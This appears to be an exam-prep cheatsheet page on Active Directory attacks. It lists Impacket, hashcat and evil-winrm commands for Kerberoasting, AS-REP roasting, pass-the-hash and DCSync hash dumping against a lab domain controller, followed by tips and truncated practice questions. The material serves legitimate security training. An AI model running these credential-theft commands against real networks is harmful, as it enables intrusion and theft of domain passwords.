Active Directory Attacks
Active Directory
Overview
Common AD attack techniques: Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync.
Cheatsheet
Kerberoasting
GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.5 -request # Request TGS for Kerberoasting
hashcat -m 13100 krb5tgs.txt wordlist.txt # Crack TGS hashes
AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -dc-ip 10.10.10.5 # Check for AS-REP Roasting (no pre-auth)
Pass-the-Hash
impacket-psexec -hashes :NTHASH user@10.10.10.5 # Pass-the-Hash with PsExec
evil-winrm -i 10.10.10.5 -u user -H NTHASH # Pass-the-Hash with Evil-WinRM
DCSync
secretsdump.py domain/user:pass@10.10.10.5 # DCSync to dump domain hashes (needs rights)
Command Examples
Common Pitfalls
- Using wrong hash format
- Not trying PTH when creds fail
Exam Survival Tips
- Check for unconstrained delegation
- Look for GenericAll permissions
Exercises
fill command
hard
Write the Impacket command to perform Kerberoasting against domain.local (user:pass, DC at 10.10.10....
multiple choice
medium
What hashcat mode is used for Kerberos TGS (Kerberoast) tickets?...
fill command
hard
Write the secretsdump command to DCSync as domain\admin with password P@ssw0rd from DC at 10.10.10.5...
multiple choice
hard
What Active Directory attack extracts the entire domain password database?...